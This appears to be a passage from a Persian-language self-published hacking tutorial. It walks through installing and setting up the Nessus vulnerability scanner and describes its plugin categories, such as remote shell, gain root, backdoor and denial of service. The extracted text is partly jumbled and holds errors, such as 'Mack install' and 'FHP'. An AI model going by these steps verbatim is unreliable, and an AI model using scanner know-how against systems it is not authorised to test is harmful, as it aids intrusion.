ﻋﻨ ﺎویﻦ ‪ Nessus-libraries‬و ‪ Nessus-core‬و ‪ Nessus-plugins‬ﺏ ﻪ ﻣﻨﻈ ﻮر ﺏ ﺎرﮔﻴﺮی و ﻧ ﺼﺐ‬ ‫ﻣﻨﺘﺸﺮ ﺷﺪﻩ اﺱﺖ‪ .‬ﻧﺼﺐ ﺏﺮﻧﺎﻣﻪ ‪ Nessus‬از ﻃﺮیﻖ هﺮ یﮏ از ایﻦ ﺱﻪ ﻧﻮع ﺏﺴﺘﻪ هﺎ ﻣﺴﺘﻠﺰم ﻃﯽ ﻣﺮاﺡﻞ اﺱﺘﺎﻧﺪارد ﺏ ﺎرﮔﻴﺮی ‪ ،‬ﮐﺎﻣﭙﺎی ﻞ و ﻧ ﺼﺐ )‬ ‫ﮐﻪ ﻣﺮاﺡﻞ ﺁن ﺏﻪ ﺕﺮﺕﻴﺐ ﻋﺒﺎرﺕﻨﺪ از اﺟﺮای ﻓﺮاﻣﻴﻦ ﻣﺮﺏﻮﻃﻪ ‪ ،‬یﻌﻨﯽ ‪ Mack ، configure‬و ‪ Mack install‬اﺱﺖ( ﻣﻴﺒﺎﺷ ﺪ‪ .‬ای ﻦ ﺏﺮﻧﺎﻣ ﻪ در ﻗﺎﻟ ﺐ‬ ‫ﭼﻬﺎرﻣﯽ ﮐﻪ یﮏ ﺁرﺷﻴﻮ ﻣﻨﻔﺮد ‪ shell‬ﻧﻴﺰ ﺏﺎ ﻋﻨﻮان ‪ Nessus-installer.sh‬ﻣﻨﺘﺸﺮ ﻣﻴﺸﻮد ﮐﻪ ﺷﺎﻣﻞ ﮐﻠﻴﻪ ﮐﺪ هﺎی ﻣ ﻮرد ﻧﻴ ﺎز ﺏ ﻮدﻩ و ﻓﺮایﻨ ﺪ ﻧ ﺼﺐ‬ ‫را ﺏﻪ ﮔﻮﻧﻪ ای ﻣﻨﺎﺱﺐ ﮐﻨﺘﺮل ﻣﯽ ﮐﻨﺪ‪ .‬ﻣﻦ ﺏ ﻪ ﻋﻠ ﺖ ایﻨﮑ ﻪ ﺁﻗ ﺎی ﺁراز در ﺱ ﺎیﺖ ‪ Tur2.com‬ﻣﺮاﺡ ﻞ ﻧ ﺼﺐ را ﺧ ﻮب ﺕﻮﺽ ﻴﺢ دادﻩ اﻧ ﺪ ‪ ،‬ای ﻦ ﻣﻘﺎﻟ ﻪ‬ ‫ﺏﻌﻼوﻩ ﻟﻴﻨﮏ ﺁن را در ﻣﻘﺎﻟﻪ ﺧﻮد ﻗﺮار ﻣﻴﺪهﻢ و ﺕﻮﺽﻴﺢ و اﻟﺒﺘﻪ ﺕﺎیﭗ اﺽﺎﻓﯽ ﺧﻮد داری ﻣﻴﮑﻨﻢ ‪:‬‬ ‫ﻟﻴﻨﮏ ﻣﻘﺎﻟﻪ ‪http://www.tur2.com/articles/n13810631.htm :‬‬ ‫ﻣﺘﻦ ﻣﻘﺎﻟﻪ ) ﻓﻘﻂ ﻗﺴﻤﺖ ﻧﺼﺐ ﺏﺮﻧﺎﻣﻪ ﺁوردﻩ ﺷﺪﻩ اﺱﺖ و از ﺁوردن ﻗﺴﻤﺘﻬﺎی دیﮕﺮ ﺧﻮد داری ﺷﺪﻩ اﺱﺖ ( ‪:‬‬ ‫ﭼﻄﻮري ﻧﺼﺐ ﮐﻨﻢ؟‬

‫اوﻻ ﺑﺎﻳﺪ در ﻣﻮد ‪ root‬ﻳﻌﻨﻲ ‪ super-user‬ﺑﻪ ﻟﻴﻨﻮﮐﺲ ‪ login‬ﮐﺮدﻩ ﺑﺎﺷﻴﺪ‪ .‬ﺣﺎﻻ ‪ shell‬ﻟﻴﻨﻮﮐﺲ رو ﺑﺎز ﮐﺮدﻩ و ﺑﻪ داﻳﺮﮐﺘﻮري ﮐﻪ ﻓﺎﻳﻞ رو اوﻧﺠﺎ داونﻟﻮد ﮐﺮدﻩاﻳﺪ وارد ﻣﻲﺷﻮﻳﺪ‪ .‬ﻣﺜﻼ‬ ‫اﮔﺮ در ‪ /root/Desktop‬ﻓﺎﻳﻞ رو داونﻟﻮد ﮐﺮدﻩاﻳﺪ‪ ،‬ﻣﻲﻧﻮﻳﺴﻴﺪ‪:‬‬ ‫‪# cd /root/Desktop‬‬ ‫ﺣﺎﻻ دﺳﺘﻮر زﻳﺮ رو ﻣﻲﻧﻮﻳﺴﻴﺪ‪:‬‬ ‫‪# sh nessus-installer.sh‬‬ ‫ﺑﻼﻓﺎﺻﻠﻪ ﺻﻔﺤﻪ ﭘﺎک ﻣﻲﺷﻪ و ﻧﻮﺷﺘﻪ زﻳﺮ ﻣﻴﺎد )اﻟﺒﺘﻪ ﺻﻔﺤﻪ ﭘﺎک ﻧﻤﻲﺷﻪ ﻓﻘﻂ اﻳﻨﮑﻪ اﻧﻘﺪر ﻧﻮﺷﺘﻪ ﻣﻴﺎد ﮐﻪ ﺑﻪ ﻧﻈﺮ ﻣﻴﺮﺳﻪ ﺻﻔﺤﻪ ﭘﺎک ﺷﺪﻩ(‪:‬‬ ‫‪-------------------------------------------------------------------------------‬‬‫‪NESSUS INSTALLATION SCRIPT‬‬ ‫‪--------------------------------------------------------------------------------‬‬

‫! ‪Welcome to the Nessus Installation Script‬‬

‫‪This script will install Nessus 2.0.7 (STABLE) on your system.‬‬

‫‪Please note that you will need root privileges at some point so that‬‬ ‫‪the installation can complete.‬‬

‫‪Nessus is released under the version 2 of the GNU General Public License‬‬ ‫‪(see http://www.gnu.org/licences/gpl.html for details).‬‬

‫‪To get the latest version of Nessus, visit http://www.nessus.org‬‬

‫‪Press ENTER to continue‬‬

٤٨

!! ‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم‬

‫ﺻﻔﺤﻪ‬

:‫ ﻳﻪ ﺳﺮي ﭼﺮت و ﭘﺮت ﻧﻮﺷﺘﻪ ﻣﻴﺸﻪ و ﺻﻔﺤﻪ ﭘﺎک ﺷﺪﻩ و ﻣﺘﻦ زﻳﺮ ﻣﻴﺎد‬.‫ رو ﻓﺸﺎر ﻣﻲدهﻴﺪ‬Enter ‫دﮐﻤﻪ‬ -------------------------------------------------------------------------------Nessus installation : installation location --------------------------------------------------------------------------------

Where do you want the whole Nessus package to be installed ? [/usr/local]

:‫ ﺣﺎﻻ ﺻﻔﺤﻪ ﭘﺎک ﻣﻴﺸﻪ و ﻧﻮﺷﺘﻪ زﻳﺮ ﻣﻴﺎد‬.‫ ﻧﺼﺐ ﺑﺸﻪ‬/usr/local ‫ رو ﻓﺸﺎر ﺑﺪﻳﻦ ﮐﻪ در ﻣﺤﻞ ﭘﻴﺶﻓﺮض ﻳﻌﻨﻲ‬Enter ‫ رو ﮐﺠﺎ ﻧﺼﺐ ﮐﻨﻢ؟ ﺷﻤﺎ دﮐﻤﻪ‬Nessus ‫اﻳﻦ ﻣﻴﮕﻪ ﮐﻪ‬ -------------------------------------------------------------------------------Nessus installation : Ready to install --------------------------------------------------------------------------------

Nessus is now ready to be installed on this host. The installation process will first compile it then install it

Press ENTER to continue ‫ﺑﺎزهﻢ ﭼﺮت و ﭘﺮتهﺎ ﺷﺮوع ﺑﻪ ﻇﺎهﺮ ﺷﺪن ﻣﻲﮐﻨﻨﺪ وﻟﻲ اﻳﻦدﻓﻌﻪ ﻳﮑﻢ ﺑﻴﺸﺘﺮ ﻃﻮل ﻣﻴﮑﺸﻪ ﮐﻪ اراﺟﻴﻒ ﺗﻤﻮم ﺑﺸﻦ ) اﻳﻨﺎ اﺑﺪا اراﺟﻴﻒ ﻧﻴﺴﺘﻨﺪ وﻟﻲ ﭼﻮن ﻣﺎ ﺑﻪ ﺻﻮرت‬ .‫ اﺻﻼ ﻟﺰوﻣﻲ ﻧﺪارﻩ ﻓﮑﺮﺗﻮن رو ﺧﺮاب ﺑﮑﻨﻴﺪ! ( ﺣﺎﻻ ﻣﻲﺗﻮﻧﻴﻦ ﻳﻪ ﭼﺎﻳﻲ واﺳﻪ ﺧﺪﺗﻮن ﺑﺮﻳﺰﻳﻦ و ﭼﻨﺪ دﻗﻴﻘﻪ اﺳﺘﺮاﺣﺖ ﮐﻨﻴﺪ‬،‫اﺗﻮﻣﺎﺗﻴﮏ دارﻳﻢ ﻧﺼﺐ ﻣﻲﮐﻨﻴﻢ‬ :‫ ﺻﻔﺤﻪ زﻳﺮ ﻇﺎهﺮ ﻣﻴﺸﻪ‬،‫وﻗﺘﻲ ﮐﺎر ﻧﺼﺐ ﺗﻤﻮم ﺷﺪ‬ -------------------------------------------------------------------------------Nessus installation : Finished --------------------------------------------------------------------------------

Congratulations ! Nessus is now installed on this host

. Create a nessusd certificate using /usr/local/sbin/nessus-mkcert . Add a nessusd user use /usr/local/sbin/nessus-adduser . Start the Nessus daemon (nessusd) use /usr/local/sbin/nessusd -D . Start the Nessus client (nessus) use /usr/local/bin/nessus . To uninstall Nessus, use /usr/local/sbin/uninstall-nessus

. Remember to invoke 'nessus-update-plugins' periodically to update your list of plugins

. A step by step demo of Nessus is available at : http://www.nessus.org/demo/

Press ENTER to quit .‫ اﻳﻦ ﺻﻔﺤﻪ ﺁﺧﺮ اﻃﻼﻋﺎت ﻣﻬﻤﻲ دارﻩ ﮐﻪ ﺗﻮﺿﻴﺢ ﻣﻲدم‬.‫ ﺑﺰﻧﻴﺪ ﮐﻪ ﻧﺼﺐ ﺗﻤﻮم ﺑﺸﻪ‬Enter ‫ﻳﻪ‬ :‫اوﻟﻴﻦ ﺟﻤﻠﻪ اﻳﻨﻪ‬

٤٩

!! ‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم‬

‫ﺻﻔﺤﻪ‬

Create a nessusd certificate using /usr/local/sbin/nessus-mkcert :‫ ﻣﻲﻧﻮﻳﺴﻴﻢ‬Shell ‫ﭘﺲ ﻣﺎ در‬ # /usr/local/sbin/nessus-mkcert :‫ ﺻﻔﺤﻪ ﭘﺎک ﺷﺪﻩ و ﻣﺘﻦ زﻳﺮ ﻇﺎهﺮ ﻣﻴﺸﻪ‬،‫ ﺑﺰﻧﻴﻢ‬Enter ‫وﻗﺘﻲ‬ ------------------------------------------------------------------------------Creation of the Nessus SSL Certificate -------------------------------------------------------------------------------

This script will now ask you the relevant information to create the SSL certificate of Nessus. Note that this information will *NOT* be sent to anybody (everything stays local), but anyone with the ability to connect to your Nessus daemon will be able to retrieve this information.

CA certificate life time in days [1460]: :‫ ﺑﻪ ﺻﻮرت زﻳﺮ‬.‫ ﺗﻤﻮم ﺑﺸﻪ‬certification ‫ ﺑﻪ ﺗﺮﺗﻴﺐ ﻣﻲزﻧﻴﻢ ﺗﺎ ﮐﺎر اﻳﺠﺎد‬Enter ‫ ﺗﺎ‬۶ ‫از هﻤﻴﻨﺠﺎ ﺗﺎ ﺁﺧﺮ ﮐﺎر‬ CA certificate life time in days [1460]: Server certificate life time in days [365]: Your country (two letter code) [FR]: Your state or province name [none]: Your location (e.g. town) [Paris]: Your organization [Nessus Users United]: :‫ﺑﻌﺪ ﺻﻔﺤﻪ زﻳﺮ ﻣﻴﺎد‬ ------------------------------------------------------------------------------Creation of the Nessus SSL Certificate -------------------------------------------------------------------------------

Congratulations. Your server certificate was properly created.

/usr/local/etc/nessus/nessusd.conf updated

The following files were created :

. Certification authority : Certificate = /usr/local/com/nessus/CA/cacert.pem Private key = /usr/local/var/nessus/CA/cakey.pem

. Nessus Server : Certificate = /usr/local/com/nessus/CA/servercert.pem Private key = /usr/local/var/nessus/CA/serverkey.pem

Press [ENTER] to exit .‫ ﺗﺎ ﮐﺎر ﺗﻤﻮم ﺑﺸﻪ‬،‫ رو هﻢ ﻣﻲزﻧﻴﻢ‬Enter ‫ﺣﺎﻻ ﺁﺧﺮﻳﻦ‬ ‫ درﺳﺖ ﮐﻨﻴﻢ ﮐﻪ ﺑﺘﻮﻧﻴﻢ‬nessus ‫ روي ﺳﺮور‬user ‫ ﺣﺎﻻ ﺑﺎﻳﺪ ﻳﮏ‬.‫ درﺳﺖ ﮐﺮدﻳﻢ‬Nessus ‫ ﺑﺮاي‬SSL Certificate ‫ رو اﺟﺮا ﮐﺮدﻳﻢ و هﻢ‬nessus-installer.sh ‫ﭘﺲ ﻣﺎ ﺗﺎ ﺣﺎﻻ هﻢ‬ :‫ ﺑﺮاي اﻳﻦﮐﺎر از دﺳﺘﻮر زﻳﺮ اﺳﺘﻔﺎدﻩ ﻣﻲﮐﻨﻴﻢ‬.‫ ﮐﻨﻴﻢ‬login ‫ﺑﻌﺪا از ﻃﺮﻳﻖ او ﺑﻪ ﻧﺮماﻓﺰار‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٥٠‬‬

‫‪# /usr/local/sbin/nessus-adduser‬‬ ‫ﺑﻪ ﻣﺤﺾ اﺟﺮاي اﻳﻦ دﺳﺘﻮر ﻣﺘﻦ زﻳﺮ ﻇﺎهﺮ ﻣﻴﺸﻪ‪:‬‬ ‫‪Add a new nessusd user‬‬ ‫‪----------------------‬‬

‫‪Login :‬‬ ‫اﻳﻦ ﻳﻌﻨﻲ ﻳﮏ ‪ username‬وارد ﮐﻦ‪ .‬اﺳﻢ ﻣﻮرد ﻧﻈﺮ رو وارد ﻣﻲﮐﻨﻴﻢ و ﺑﻌﺪ ﺳﻄﺮ زﻳﺮ ﻣﻴﺎد‪:‬‬ ‫‪Authentication (pass/cert) [pass] :‬‬ ‫اﻳﻦ ﻳﻌﻨﻲ روش هﻮﻳﺖﺳﻨﺠﻲ ﭼﻲ ﺑﺎﺷﻪ‪ .‬ﻣﺎ ‪ Enter‬ﻣﻲزﻧﻴﻢ ﮐﻪ هﻤﻮن ﭘﻴﺶﻓﺮض ﻳﻌﻨﻲ ‪ pass‬ﺑﻤﻮﻧﻪ‪ .‬ﺑﻌﺪ ﺳﻄﺮ زﻳﺮ ﻣﻴﺎد‪:‬‬ ‫‪Login password :‬‬ ‫اﻳﻨﺠﺎ ﺑﺎﻳﺪ ﭘﺴﻮرد ﺑﺮاي ﻳﻮزر رو وارد ﮐﻨﻴﻢ‪ .‬اول ﻳﻪ ﻧﮕﺎﻩ ﺑﻪ ﭼﭗ‪ ،‬ﺑﻌﺪ ﻳﻪ ﻧﮕﺎﻩ ﺑﻪ راﺳﺖ‪ ،‬ﺑﻌﺪ ﻳﻪ ﻧﮕﺎﻩ ﺑﻪ ﻋﻘﺐ! ﺣﺎﻻ ﭘﺴﻮرد رو ﺑﻨﻮﻳﺴﻴﺪ ) از ﮐﺎراﮐﺘﺮ * ﻣﻮﻗﻊ وارد ﮐﺮدن ﭘﺴﻮرد‬ ‫ﺧﺒﺮي ﻧﻴﺴﺖ‪ .‬واﺳﻪ هﻤﻴﻦ ﻣﺮاﺳﻢ رو ﺑﺠﺎ ﺁوردﻳﻢ! (‬ ‫ﺣﺎﻻ اﻳﻦ ﻣﺘﻦ ﻇﺎهﺮ ﻣﻴﺸﻪ‪:‬‬ ‫‪User rules‬‬ ‫‪---------‬‬‫‪nessusd has a rules system which allows you to restrict the hosts‬‬ ‫‪that ali has the right to test. For instance, you may want‬‬ ‫‪him to be able to scan his own host only.‬‬

‫‪Please see the nessus-adduser(8) man page for the rules syntax‬‬

‫‪Enter the rules for this user, and hit ctrl-D once you are done :‬‬ ‫)‪(the user can have an empty rules set‬‬ ‫اﻳﻨﺠﺎ ﻣﻴﺸﻪ ﻳﻪ ﺳﺮي ‪ Rules‬واﺳﻪ ‪ user‬ﺗﻌﺮﻳﻒ ﮐﻨﻴﻢ ﮐﻪ داﻣﻨﻪ ﺟﺎهﺎﻳﻲ ﮐﻪ ﻣﻲﺗﻮﻧﻪ اﺳﮑﻦ ﮐﻨﻪ رو ﻣﺤﺪود ﮐﻨﻴﻢ‪ ،‬وﻟﻲ ﻓﻌﻼ ﻻزم ﻧﻴﺴﺖ‪ ،‬ﭘﺲ ﺗﺮﮐﻴﺐ ‪ ctrl-D‬رو ﻓﺸﺎر‬ ‫ﻣﻲدﻳﻢ‪ .‬ﺣﺎﻻ اﻳﻦ ﻇﺎهﺮ ﻣﻴﺸﻪ‪:‬‬ ‫‪: xxxxxxxxxx‬‬

‫‪Login‬‬

‫‪: yyyyyyyyy‬‬

‫‪Password‬‬

‫‪:‬‬

‫‪DN‬‬

‫‪:‬‬

‫‪Rules‬‬

‫]‪Is that ok ? (y/n) [y‬‬ ‫ﻳﻪ ‪ Enter‬ﻣﻲزﻧﻴﻢ ﮐﻪ ﮐﺎر ﺗﻤﻮم ﺑﺸﻪ‪.‬‬ ‫ﺗﺒﺮﻳﮏ ﻣﻲﮔﻢ‪ .‬ﻧﺮماﻓﺰار ‪ nessus‬ﺑﻪ هﻤﻴﻦ راﺣﺘﻲ ﻧﺼﺐ ﺷﺪ!‬

‫‪ -‬ﻧﺮماﻓﺰار رو ﻧﺼﺐ ﮐﺮدم‪ .‬ﺣﺎﻻ ﭼﻄﻮري ‪ nessus‬را اﺟﺮا ﮐﻨﻴﻢ؟‬

‫‪ -١‬هﺮ ﺑﺎر ﮐﻪ ﮐﺎﻣﭙﻴﻮﺗﺮ رو ‪ restart‬ﻣﻲﮐﻨﻴﺪ‪ ،‬اﮔﻪ ﺑﺨﻮاﻳﻦ از ‪ nessus‬اﺳﺘﻔﺎدﻩ ﮐﻨﻴﺪ‪ ،‬اول ﺑﺎﻳﺪ ﺳﺮور ‪ nessus‬رو اﺟﺮا ﮐﻨﻴﺪ‪ .‬ﺑﺮاي اﺟﺮا ﮐﺮدن ﺳﺮور ‪ nessus‬ﮐﻪ ﺑﻪ اون ‪nessus‬‬ ‫‪ daemon‬ﻳﺎ ﺑﻪ ﺷﮑﻞ ﺧﻼﺻﻪ ‪ nessusd‬ﻣﻲﮔﻦ‪ ،‬دﺳﺘﻮر زﻳﺮ رو ﻣﻲﻧﻮﻳﺴﻴﻢ‪:‬‬ ‫‪# /usr/local/sbin/nessusd -D‬‬ ‫ﺑﻪ اﻳﻦ راﺣﺘﻲ ﺳﺮور ‪ nessus‬راﻩاﻧﺪازي ﻣﻲﺷﻮد‪.‬‬ ‫‪ -٢‬ﺣﺎﻻ ﮐﻼﻳﻨﺖ رو اﺟﺮا ﻣﻲﮐﻨﻴﻢ‪ .‬ﻧﮑﺘﻪ ﻣﻬﻢ اﻳﻨﮑﻪ هﺮ ﭼﻨﺪ ﺗﺎ ﮐﻼﻳﻨﺖ ﮐﻪ ﺑﺨﻮاﻳﻦ ﻣﻲﺗﻮﻧﻴﻦ اﺟﺮا ﮐﻨﻴﺪ‪ .‬ﺑﺮاي اﻳﻦ ﮐﺎر از دﺳﺘﻮر زﻳﺮ اﺳﺘﻔﺎدﻩ ﻣﻲﺷﻮد‪:‬‬ ‫‪# /usr/local/bin/nessus‬‬ ‫ﺑﺎ اﺟﺮاي اﻳﻦ دﺳﺘﻮر ﭘﻨﺠﺮﻩ ﻧﺮماﻓﺰار ﻇﺎهﺮ ﻣﻴﺸﻪ‪ .‬ﺗﻮﺟﻪ ﮐﻨﻴﺪ ﮐﻪ ‪ nessus‬در ﺣﺎﻟﺖ ﻣﺘﻨﻲ هﻢ ﮐﺎر ﻣﻲﮐﻨﻪ وﻟﻲ اﺳﺘﻔﺎدﻩ از ﺣﺎﻟﺖ ﮔﺮاﻓﻴﮑﻲ راﺣﺖﺗﺮ اﺳﺖ‪.‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٥١‬‬

‫ﺧﻮب اﻣﻴﺪ وارم ﮐﺎﻣﻞ ﺏﺎﺷﺪ واﻗﻌﺎ ﺏﻌﺪ از ﻧﻮﺷﺘﻦ ایﻦ ‪ ٥٠‬اﻧﺪی ﺻﻔﺤﻪ ﺡﺎل ﺕﺎیﭗ ﺏﺮام ﻧﻤﻮﻧﺪﻩ ‪.‬‬ ‫ﺏﺎ ﻋﺮض ﭘﻮزش از ﻧﻮیﺴﻨﺪﻩ ﻣﻘﺎﻟﻪ ﺏﺎﻻ !!‬ ‫ﺧﻮب وﻗﺘﯽ ﺏﺮﻧﺎﻣﻪ ﺏﺎﻻ ﺁﻣﺪ اول از ﺷﻤﺎ ﻧﺎم ﮐﺮﺏﺮی و ﮐﻠﻤﻪ ﻋﺒﻮر را ﻣﻴﺨﻮاهﺪ‪ .‬ﺷ ﺎیﺪ ﺏﻌ ﺪ از ای ﻦ ﻣﺮﺡﻠ ﻪ ﭘﻨﺠ ﺮﻩ ای ﺏ ﺎز ﺷ ﻮد و ﺷ ﻤﺎ ان را از ﺡﺎﻟ ﺖ‬ ‫ﭘﻴﺶ ﻓﺮض ﺕﻐﻴﻴﺮ ﻧﺪهﻴﺪ و ‪ OK‬را ﺏﺰﻧﻴﺪ‪ .‬ﺏﻌﺪ از ایﻦ ﻣﺮﺡﻠﻪ ﺏﻪ ﺏﺮﮔﻪ ‪ Plugins‬ﻣﻴﺮﺱﻢ ﮐﻪ هﺮیﮏ از ‪ Script‬هﺎ ‪ ،‬دﺱ ﺘﻪ ﺏﻨ ﺪی ﺷ ﺪﻩ اﺱ ﺖ ‪ ،‬ﮐ ﻪ ﻣ ﻦ‬ ‫دﺱﺘﻪ هﺎ را در ﺟﺪول زیﺮ ﺕﻮﺽﻴﺢ دادﻩ ام ﮐﺎر ﺁﻧﻬﺎ را ‪:‬‬ ‫‪١‬‬

‫ﻧﺎم ‪Plug-in‬‬ ‫‪Miscellaneous‬‬

‫‪٢‬‬

‫‪Gain a shell remotely‬‬

‫‪٣‬‬

‫‪Finger abuses‬‬

‫‪۴‬‬

‫‪Windows‬‬

‫‪۵‬‬ ‫‪۶‬‬

‫‪Backdoor‬‬ ‫‪General‬‬

‫‪٧‬‬

‫‪SNMP‬‬

‫‪٨‬‬

‫‪CGI abuses‬‬

‫‪٩‬‬

‫‪Remote file Access‬‬

‫‪١٠‬‬

‫‪RPC‬‬

‫‪١١‬‬

‫‪Gain root remotely‬‬

‫‪١٢‬‬

‫‪Firewalls‬‬

‫‪١٣‬‬

‫‪Useless service‬‬

‫‪١۴‬‬

‫‪Denial-of-Service‬‬

‫‪١۵‬‬

‫‪FTP‬‬

‫‪١۶‬‬

‫‪NIS‬‬

‫‪١٧‬‬

‫‪SMTP problems‬‬

‫‪١٨‬‬

‫‪Windows User Managemnt‬‬

‫ﺕﻮﺽﻴﺢ ﻋﻤﻠﮑﺮد دﺱﺘﻪ‬ ‫ایﻦ ‪ Script‬هﺎ ﺁزﻣﻮﻧﻬﺎیﯽ درﺏﺎرﻩ ﺡﺴﺎب هﺎی ﮐﺎرﺏﺮی و ﻣﺴﻴﺮﺟﻮهﺎ‬ ‫و‪..‬اﻧﺠﺎم ﻣﻴﺪهﻨﺪ‬ ‫ایﻦ ‪ Script‬هﺎ ﺁزﻣﻮﻧﻬﺎیﯽ ر ﺏﺎرﻩ ﺱﺮ ریﺰی ﺏﺎﻓﺮ و ﮔﺮیﺰ از دﺱﺖ‬ ‫ﺱﻴﺴﺘﻢ اﺡﺮاز هﻮیﺖ اﻧﺠﺎم ﻣﻴﺪهﻨﺪ‪.‬‬ ‫ایﻦ ‪ Script‬هﺎ ﺁزﻣﻮﻧﻬﺎیﯽ در ﺏﺎرﻩ ﺷﺒﺢ ‪ Finger‬ﮐﻪ اﻣﮑﺎن دﺱﺘﻴﺎﺏﯽ ﺏﻪ‬ ‫ﻓﺎیﻞ هﺎی ﺡﻔﺎﻇﺖ ﺷﺪﻩ ‪ ،‬ﻓﺮﻣﺎﻧﻬﺎی ﺱﻴﺴﺘﻤﯽ ﺡﻔﺎﻇﺖ ﺷﺪﻩ و اﻃﻼﻋﺎت‬ ‫ﺡﻔﺎﻇﺖ ﺷﺪﻩ ﮐﺎرﺏﺮان را در اﺧﺘﻴﺎر ﻣﻬﺎﺟﻢ ﻣﻴﮕﺰارد‪ ،‬اﻧﺠﺎم ﻣﯽ دهﺪ‪.‬‬ ‫ایﻦ ‪ Script‬ﺁزﻣﻮﻧﻬﺎیﯽ در ﺏﺎرﻩ ﭘﺮوﺕﮑﻞ هﺎی ‪ SMB‬و ‪ NetBIOS‬و‬ ‫ﺱﺎیﺮ ﺡﻔﺮﻩ هﺎی ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ ویﻨﺪوز اﻧﺠﺎم ﻣﻴﺪهﺪ‪.‬‬ ‫ایﻦ ‪ Script‬هﺎ دﻧﺒﺎل ﺏﺮﻧﺎﻣﻪ هﺎی اﺱﺐ ﺕﺮﺁوا ﻣﻴﮕﺮدد ‪.‬‬ ‫ایﻦ ‪ Script‬هﺎ ﺁزﻣﺎیﺸﯽ در ﺏﺎرﻩ ﺷﻤﺎرﻩ ویﺮایﺶ و اﻃﻼﻋﺎت ﺏﺮﻧﺎﻣﻪ‬ ‫هﺎی ﮐﺎرﺏﺮدی و ﺱﺮویﺲ دهﻨﺪﻩ هﺎ ﮐﻪ ﻣﻤﮑﻦ اﺱﺖ ﻣﻔﻴﺪ ﺏﺎﺷﺪ اﻧﺠﺎم‬ ‫ﻣﻴﺪهﺪ‪.‬‬ ‫ایﻦ ‪ Script‬هﺎ ﺁزﻣﻮﻧﻬﺎیﯽ در ﻣﻮرد ﭘﺮوﺕﮑﻞ ‪ SNMP‬ﺏﻪ ﻣﻨﻈﻮر ﮐﺸﻒ‬ ‫ﺡﻔﺮﻩ هﺎی ﻗﺎﺏﻞ اﺱﺘﻔﺎدﻩ اﻧﺠﺎم ﻣﻴﺪهﺪ‪.‬‬ ‫ایﻦ ‪ Script‬هﺎ ﺁزﻣﻮﻧﻬﺎیﯽ در ﻣﻮرد ﻗﺎﺏﻠﻴﺖ ﻧﻔﻮذ ﺏﺮﻧﺎﻣﻪ هﺎی ‪ CGI‬ﺏﻪ‬ ‫ﻣﻨﻈﻮر ﻧﻔﻮذ در وب ﺱﺮور هﺎیﯽ هﻤﭽﻮن ‪ IIS‬و ‪ Apache‬و ﺏﺮﻧﺎﻣﻪ‬ ‫هﺎی ﮐﺎرﺏﺮدی ﻧﻮﺷﺘﻪ ﺷﺪﻩ ﺏﺎ ‪ FHP‬و ‪ Cold fusion‬و ‪Front Page‬‬ ‫اﻧﺠﺎم ﻣﻴﺪهﺪ‪.‬‬ ‫ایﻦ ‪ Script‬هﺎ ﺁزﻣﻮﻧﻬﺎیﯽ درﺏﺎرﻩ روﺷﻬﺎی ﻏﻴﺮ ﻣﺠﺎز دﺱﺘﺮﺱﯽ ﺏﻪ‬ ‫ﻓﺎیﻠﻬﺎ از ﻃﺮیﻖ ﺱﺮویﺲ هﺎیﯽ ‪ NFS‬یﺎ ‪ HTTP‬یﺎ ‪ ...‬اﻧﺠﺎم ﻣﻴﺪهﺪ‬ ‫ایﻦ ‪ Script‬هﺎ ﺁزﻣﻮﻧﻬﺎیﯽ در ﻣﻮرد دﺱﺘﻴﺎﺏﯽ ﺏﻪ اﻃﻼﻋﺎت ‪ RPC‬و‬ ‫ﺱﺮویﺲ هﺎی ﻗﺎﺏﻞ ﻧﻔﻮذ ﺁن ﻣﺎﻧﻨﺪ ‪ mountd‬و ‪ ststd‬اﻧﺠﺎم ﻣﻴﺪهﺪ‪.‬‬ ‫ایﻦ ‪ Script‬هﺎ ﺁزﻣﻮﻧﻬﺎیﯽ را در ﺏﺎرﻩ دﺱﺖ رﺱﯽ از راﻩ دور ﺏﻪ ﺱﻴﺴﺘﻢ‬ ‫ﺕﺤﺖ ﻧﺎم ﮐﺎرﺏﺮ اﺻﻠﯽ اﻧﺠﺎم ﻣﻴﺪهﺪ‪.‬‬ ‫ایﻦ ‪ Script‬هﺎ ﺁزﻣﻮﻧﻬﺎیﯽ در ﺏﺎرﻩ ﭘﻴﮑﺮ ﺏﻨﺪی ﻧﺎدرﺱﺖ دیﻮار ﺁﺕﺶ‬ ‫اﻧﺠﺎم ﻣﻴﺪهﺪ‪.‬‬ ‫ایﻦ ‪ Script‬هﺎ ﺁزﻣﻮﻧﻬﺎی در ﻣﻮرد ﺱﺮویﺴﻬﺎی ﻣﻨﺴﻮخ ﺷﺪﻩ ای ﻣﺎﻧﻨﺪ‬ ‫‪ echo‬و ‪ daytime‬و ‪ rsh‬و‪ ...‬اﻧﺠﺎم ﻣﻴﺪهﺪ‪.‬‬ ‫ایﻦ اﺱﮑﺮیﭙﺖ هﺎ ﺁزﻣﻮﻧﻬﺎیﯽ را ﺏﻪ ﻣﻨﻈﻮر ﺕﺸﺨﻴﺺ ﺡﻤﻼﺕﯽ از ﻧﻮع‬ ‫‪ DOS‬اﻧﺠﺎم ﻣﻴﺪهﺪ‪.‬‬ ‫ایﻦ ‪ Script‬هﺎ ﺁزﻣﻮﻧﻬﺎیﯽ در ﺏﺎرﻩ ﻧﻘﺎط ﺽﻌﻒ ﺏﺮﻧﺎﻣﻪ ‪ FTP‬اﻧﺠﺎم‬ ‫ﻣﻴﺪهﺪ‪.‬‬ ‫ایﻦ ‪ Script‬ﺁزﻣﻮﻧﻬﺎیﯽ در ﻣﻮرد ﻗﺎﺏﻠﻴﺖ ﻧﻔﻮذ ﭘﺬیﺮی ﺏﻪ واﺱﻄﻪ ﺱﺮویﺲ‬ ‫‪ NIS‬ﮐﻪ 